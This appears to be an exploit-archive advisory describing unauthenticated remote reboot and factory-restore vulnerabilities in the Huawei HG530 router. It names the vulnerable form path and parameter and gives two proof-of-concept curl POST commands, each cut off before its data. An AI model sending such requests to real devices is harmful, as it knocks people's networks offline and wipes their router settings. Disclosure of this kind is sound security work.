Huawei HG530 Reboot / Restore Authentication Bypass

Huawei HG530 suffers from unauthenticated remote reboot and restore vulnerabilities.

MD5 | 960066e7bdcc835fbc6e47444eb6a973

Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability


The Huawei HG530 suffers from multiple Unauthenticated reboot and restore
vulnerability allows local attackers to reboot the device or to restore to
factory Configuration without user interaction.


The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'


Security issue PoC :

1-Rebooting :

curl -vv -X POST --path-as-is -d '

2-Restoring :

curl -vv -X POST --path-as-is -d '


Related Posts